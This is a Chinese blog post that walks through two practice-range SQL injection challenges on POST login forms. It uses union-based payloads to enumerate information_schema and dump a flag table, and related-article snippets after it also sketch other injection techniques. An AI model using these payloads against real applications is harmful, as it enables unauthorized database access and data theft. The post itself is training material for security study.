SQL注入---Post注入----Rank1---2

最新推荐文章于 2022-04-14 09:25:07 发布
最新推荐文章于 2022-04-14 09:25:07 发布
阅读量341 收藏
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46735316/article/details/105490731
版权

4.2.1-SQL注入-POST注入Rank 1

1.查询是否有注入点

对输入框填入一些闭合的符号,看页面是否异常。在输入框输入’,页面正常,证明’闭合有效
在这里插入图片描述

2.猜解字段数

order by 查询字段数
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
得出字段数为3

3.union联合查询输出点

在这里插入图片描述

4.查询当前数据库名

’ union select 1,2,database()#
在这里插入图片描述
得出数据库名为post_error

5.查询post_error数据库下表名

’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘post_error’ #
在这里插入图片描述
post_error数据库下有flag和user两个表

6.查询表中字段名

’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘flag’#
在这里插入图片描述

7.查表中的内容

’ union select 1,Id,flag from flag #
在这里插入图片描述
得出flag为zKaQ-PostK1

4.2.2-SQL注入-POST注入Rank 2

1.查询是否有注入点

对输入框填入一些闭合的符号,看页面是否异常。在输入框输入"),页面正常,证明")闭合有效

在这里插入图片描述

2.猜解字段数

在这里插入图片描述
在这里插入图片描述
得出字段数为3

2.union联合查询输出点

union select 1,2,3 #
在这里插入图片描述

3.查询当前数据库名

") union select 1,2,database() #
在这里插入图片描述
得出数据库名为post_error

4.查询数据库下的表名

") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘post_error’ #
在这里插入图片描述
查出post_error数据库下有flag和user两个表

5.查询表中字段

") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘flag’ #
在这里插入图片描述

6.查表中内容

") union select 1,Id,flag from flag limit 1,1 #
在这里插入图片描述
得出flag值为zKaQ-XZT

Ran? ?
关注
《网络安全自学教程》- SQL注入之布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 4831
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
封神台SQL注入-header注入
qq_40941912的博客
08-25 733
一、原理 数据路径出现符号是会爆错的 全局变量: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取了 $_POST (获取POST传参) $_GET (获取GET的传参) $_COOKIE (获取COOKIE的值) $_SERVER (包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组) **$_SERVER()**它包含着诸多的信息,有头信息(heander),路径(path),脚本位置
SQL注入靶场作业——显错注入RANK1~4
weixin_45540609的博客
04-14 273
RANK1 一、查看是否有SQL漏洞 id=2和id=4-2回显相同内容,说明有SQL注入漏洞 二、猜字段 http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 order by 4 说明只有3个字段 三、查找回显点 2,3字段会显示,所以第2,3字段是回显点 四、系统自带库查找表名,字段名 http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1.22222%20uni
mysql注入靶场,SQL注入靶场—Post注入 Rank1-3
weixin_36476970的博客
03-18 171
---------------------------------Rank 1 -------------------------------------------------先在表单Username编辑框中输入1,点登录,页面回显如下:image.png然后在Username中输入1',点登录,再看回显,看是否存在注入:image.png可看到存在注入,且从错误提示信息中可以看到,数据库是My...
SQL注入之http header注入/盲注/宽字节注入
情感博主V
02-17 950
http header注入 常见存在注入的头部参数 参数 描述 HOST 服务器的域名或IP地址端口 User-Agent 客户端的浏览器类型 Cookie 验证用户身份 Referer 发起该请求来源的地址 X-Forwarded-For 请求方的真实IP 原理 服务端从请求包中获取、验证请求头中的某些参数信息,此过程会将这些信息存储在数据库中,若没有进行过滤...
SQL注入----显错注入Rank1--4
weixin_46735316的博客
04-13 692
4.1.1 SQL注入-显错注入 Rank 1 1.判断是否存在注入点: 在正常输入后面添加and 1=1 #查看是否正常回显。如果一切正常说明该处存在注入点。 2.猜解字段数 每一个数据库查询语句的结果都是一个表格,使用order by查询字段数,尝试到页面返回错误得出字段数。 得出字段数为3 3.查询联合输出点 用and 1=2 union select 1,2,3#查询(或者 un...
AideRSS重新发布PostRank品牌
culi3118的博客
08-05 131
In July, I called Canadian startup AideRSS “one of the most useful utilities I’ve come across over the past year.” That’s not hyperbole. The feed filtering web application, which uses publicly avail...
SQL注入--POST注入
weixin_52151447的博客
11-19 3676
post注入与get注入区别在于POST注入在传参时不会将
封神台SQL注入-POST注入
qq_40941912的博客
08-24 843
一、原理 判断注入点 判断当前页面字段总数 判断显示位 查当前数据库 查表名 查列名 查字段内容 POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别 最经典的POST注入莫过于万能密码:'or 1=1# Mysql在5.0以上版本加入了 information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等 information_schema.tables 存放表名和库名的对应 inf
封神台SQL注入-宽字节
qq_40941912的博客
10-05 387
一、原理 magic_quotes_gpc(魔术引号开关) magic_quotes_gpc函数在php中的作用是判断解析用户提交的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误。 单引号(’)、双引号(”)、反斜线(\)与 NULL(NULL 字符)等字符都会被加上反斜线 GBK全称《汉字内码扩展规范》,gbk是一种多字符编码。他使用了双字节编码方案,因为双字节编码所以gbk编码汉字,占
封神台SQL注入-盲注
qq_40941912的博客
10-05 790
一、原理 所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击。 服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 布尔型盲注 => 通过GET/_GET/G​ET/_POST传参获取后台数据库内容,并且可以通过URL栏/登录框进行SQL代码注入的 length() => 返回(字符串)长度的数值 substr([],[A],[B]) => 返回[]值中,[A]开始[B]位后的字符值 ascii() => 通过数值返回(此处内容)的阿斯克码 二、作业 (一) SQ
sql注入学习笔记1
qq_61109509的博客
02-06 3096
[极客大挑战 2019]EASYSQL 根据提示,用户名就是cl4y,密码试一试万能密码。出现flag [强网杯 2019]随便注 先试试万能密码 再看下字段数,是两列 使用union联合查询检测信息回显位置,发现它过滤了select 学习一波堆叠注入 与仅限于SELECT语句的UNION联合查询攻击不同,堆叠注入可以用于执行任何SQL语句 首先展示所有数据库 没有我们想要的信息,那就展示一下所有的表 查看第一个表的信息 1;desc `191981093..
数据库
qq_51085767的博客
01-29 180
数据库常用的操作 ##数据库基础环境安装: 1.修改主机名 2.关闭防火墙以及SELinux服务 #systemctl stop firewalld #setenforce 0 3.配置hosts文件 4.配置yum源并安装数据库服务 配置yum源步骤: 创建挂载目录 进行挂载操作 并自行配置yum源 之后安装数据库服务并设置开机自启 5.初始化数据库并修改配置文件 #mysql_secure_installation并进行一系列的操作 重启数据库服务并进入数据库 即数据库创建成功 一.MYSQL常用操作
Mongo索引与查询具体操作demo
Pert的博客
11-05 372
索引 查看索引 db.stu.getIndexes()   创建索引 db.stu.createIndex({'rank':-1})   删除索引 db.stu.dropIndex({'rank':-1}) 创建唯一索引 title里的数据不重复 db.stu.createIndex({'title':1},{unique:true})   打印出执行状态 里面有时间 db.stu.find({name:'test10000'}).expl.
MongoDB 入门实战
XDarker的博客
05-30 337
一.基本概念的理解 MongoDB是一个基于分布式文件存储的数据库。MongoDB是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。Mongo最大的特点是它支持的查询语言非常强大,其语法有点类似于面向对象的查询语言,几乎可以实现类似关系数据库单表查询的绝大部分功能,而且还支持对数据建立索引。 在NoSql的数据库中,操作数据都是通过指令或程序语言完成...
sql注入学习笔记:
m0_52341820的博客
04-14 363
一、Mysql基础知识 1、注释 单行注释 # 多行注释 /* */ 单行注释 --空格 一般用-- + 内联注释 /*!5001*/ 注释掉的内容只有高版本的mysql才会执行 2、语句 语句/函数 解释/功能 示例 union 用来拼接两个select语句,每个查询必须拥有相同列数,结果等于等一个select语句中的列名,默认选取不同值,允许重复值用union all ...
union注入的几道ctf题,实验吧简单的sql注入1,2,这个看起来有点简单和bugku的成绩单...
weixin_30568591的博客
05-07 595
这几天在做CTF当中遇到了几次sql注入都是union,写篇博客记录学习一下。 首先推荐一篇文章“https://blog.csdn.net/Litbai_zhang/article/details/83869918” 再附上一张文章里面的图 接下来直接上题 1.这个看起来有点简单 题目连接:http://ctf5.shiyanbar.com/8/inde...
Elasticsearch(8) --- 聚合查询(Metric聚合)
a8892117的博客
09-21 1011
Elasticsearch(8) --- 聚合查询(Metric聚合) 在Mysql中,我们可以获取一组数据的 最大值(Max)、最小值(Min)。同样我们能够对这组数据进行 分组(Group)。那么对于Elasticsearch中 我们也可以实现同样的功能,聚合有关资料官方文档内容较多,这里大概分3篇或者4篇博客写这个有关Elasticsearch聚合。 官方对聚合有四个关键字: M...
SELECT 1,2,3...的含义及其在SQL注入中的用法
热门推荐
weixin_44840696的博客
04-09 2万+
SQL注入中,有两个工具常常用到,一个是select接一串数字,如select 1,2,3;另一个是order by一个数字,如order by 4。那么这两个工具的内涵是什么,在SQL注入中又有什么作用呢? 首先,select 之后可以接一串数字:1,2,3…只是一个例子,这串数字并不一定要按从小到大排列,也不一定从1开始,这串数字的值和顺序是任意的,甚至可以是重复的,如:11,465...
SQL注入实战:sqli-labs实验详解
id=-1'unionselect1,2,3--+来确定。 进一步,可以尝试获取数据库信息。使用union select语句结合database()函数可以获取当前数据库名,例如?id=-1'unionselect1,database(),3--+。再通过information_schema表格,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值